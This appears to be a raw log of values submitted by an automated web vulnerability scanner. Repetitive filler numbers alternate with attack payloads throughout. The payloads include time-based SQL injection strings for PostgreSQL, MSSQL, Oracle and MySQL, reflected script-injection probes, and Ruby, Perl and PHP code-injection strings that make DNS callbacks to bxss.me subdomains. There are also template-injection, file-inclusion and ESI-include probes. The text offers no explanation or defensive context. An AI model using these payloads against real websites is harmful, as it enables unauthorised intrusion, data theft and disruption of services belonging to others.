555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
@@U5VmF
555????%2527%2522\'\"
555'"
555'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
555Y1TMD1vw')) OR 662=(SELECT 662 FROM PG_SLEEP(15))--
555hPqutJ45') OR 111=(SELECT 111 FROM PG_SLEEP(15))--
555TmZpuOMZ' OR 315=(SELECT 315 FROM PG_SLEEP(15))--
555-1)) OR 440=(SELECT 440 FROM PG_SLEEP(15))--
555-1) OR 281=(SELECT 281 FROM PG_SLEEP(15))--
555-1 OR 264=(SELECT 264 FROM PG_SLEEP(15))--
555v4NnjCen'; waitfor delay '0:0:15' --
555-1 waitfor delay '0:0:15' --
555-1); waitfor delay '0:0:15' --
555-1; waitfor delay '0:0:15' --
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
5550"XOR(555*if(now()=sysdate(),sleep(15),0))XOR"Z
5550'XOR(555*if(now()=sysdate(),sleep(15),0))XOR'Z
555*if(now()=sysdate(),sleep(15),0)
-1" OR 2+883-883-1=0+0+0+1 --
-1' OR 2+442-442-1=0+0+0+1 or 'SDJm74Sg'='
-1' OR 2+139-139-1=0+0+0+1 --
-1 OR 2+476-476-1=0+0+0+1
-1 OR 2+283-283-1=0+0+0+1 --
555
555jpvT1VAa
555
555
555
@@2uaB5
20????%2527%2522\'\"
20'"
20'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
20*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
20LilqiCL5')) OR 555=(SELECT 555 FROM PG_SLEEP(15))--
20VHvVKCm1') OR 320=(SELECT 320 FROM PG_SLEEP(15))--
20ew3XrPDg' OR 654=(SELECT 654 FROM PG_SLEEP(15))--
20-1)) OR 985=(SELECT 985 FROM PG_SLEEP(15))--
20-1) OR 424=(SELECT 424 FROM PG_SLEEP(15))--
20-1 OR 971=(SELECT 971 FROM PG_SLEEP(15))--
20WMpHbOeM'; waitfor delay '0:0:15' --
20-1 waitfor delay '0:0:15' --
20-1); waitfor delay '0:0:15' --
20-1; waitfor delay '0:0:15' --
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
200"XOR(20*if(now()=sysdate(),sleep(15),0))XOR"Z
200'XOR(20*if(now()=sysdate(),sleep(15),0))XOR'Z
20*if(now()=sysdate(),sleep(15),0)
-1" OR 2+470-470-1=0+0+0+1 --
-1' OR 2+56-56-1=0+0+0+1 or 'bUM5IeJ9'='
-1 OR 2+118-118-1=0+0+0+1
-1' OR 2+645-645-1=0+0+0+1 --
-1 OR 2+122-122-1=0+0+0+1 --
20
20jPavSK6D
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
@@leiIk
555????%2527%2522\'\"
555'"
555'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
5552jKPowCH')) OR 692=(SELECT 692 FROM PG_SLEEP(15))--
555TEhtMFjS') OR 186=(SELECT 186 FROM PG_SLEEP(15))--
5557CKIiorx' OR 993=(SELECT 993 FROM PG_SLEEP(15))--
555-1)) OR 954=(SELECT 954 FROM PG_SLEEP(15))--
555-1) OR 295=(SELECT 295 FROM PG_SLEEP(15))--
555-1 OR 867=(SELECT 867 FROM PG_SLEEP(15))--
555w9mDFsX9'; waitfor delay '0:0:15' --
555-1 waitfor delay '0:0:15' --
555-1); waitfor delay '0:0:15' --
555-1; waitfor delay '0:0:15' --
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
5550"XOR(555*if(now()=sysdate(),sleep(15),0))XOR"Z
5550'XOR(555*if(now()=sysdate(),sleep(15),0))XOR'Z
555*if(now()=sysdate(),sleep(15),0)
-1" OR 2+36-36-1=0+0+0+1 --
-1' OR 2+141-141-1=0+0+0+1 or 'STg3nRL2'='
-1' OR 2+842-842-1=0+0+0+1 --
-1 OR 2+622-622-1=0+0+0+1
-1 OR 2+692-692-1=0+0+0+1 --
555
555SCizGGOn
555
555
555
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
209017540
20
20
20
20
'"()&%<acx><ScRiPt >vRAY(9675)</ScRiPt>
20
20
20
20
20
20'"()&%<acx><ScRiPt >vRAY(9810)</ScRiPt>
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
<!--
20
20
20
20
'"
20
20
/xfs.bxss.me
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
20
20
20
20
20
20
20
20
index.php/.
20
20
20
index.php
20
'+'A'.concat(70-3).concat(22*4).concat(121).concat(89).concat(111).concat(70)+(require'socket'
Socket.gethostbyname('hitvf'+'jutzxooec6e5c.bxss.me.')[3].to_s)+'
20
index.php
20
"+"A".concat(70-3).concat(22*4).concat(118).concat(81).concat(106).concat(66)+(require"socket"
Socket.gethostbyname("hitnk"+"geoaeayxb0782.bxss.me.")[3].to_s)+"
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
'.print(md5(31337)).'
20
20
20
${@print(md5(31337))}\
20
20
20
${@print(md5(31337))}
20
20
20
";print(md5(31337));$a="
bxss.me/t/xss.html?%00
20
".gethostbyname(lc("hitzg"."dqurmsna09314.bxss.me."))."A".chr(67).chr(hex("58")).chr(99).chr(71).chr(121).chr(68)."
';print(md5(31337));$a='
https://bxss.me/t/xss.html?%00
20
;print(md5(31337));
'.gethostbyname(lc('hitbn'.'atjsjeeu71e97.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(106).chr(83).chr(114).chr(67).'
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
'"()
20
20
20
Array
20
20
20
20
20
20
20
20
^(#$!@#$)(()))******
20
20
!(()&&!|*|*|
20
20
20
20
)
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20&n913932=v937140
20
20
20
20
20
20
20
20
bxss.me
20
20
https://bxss.me/t/fit.txt?.jpg
20
20
20
https://bxss.me/t/fit.txt
20
20
20
1some_inexistent_file_with_long_name .jpg
20
https://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg
20
20
20
20
20
20
20
20
${9999651+9999073}
20
20
20
20
20
20
20
20
20
20
20
20
20
20<esi:include src="https://bxss.me/rpb.png"/>
20
20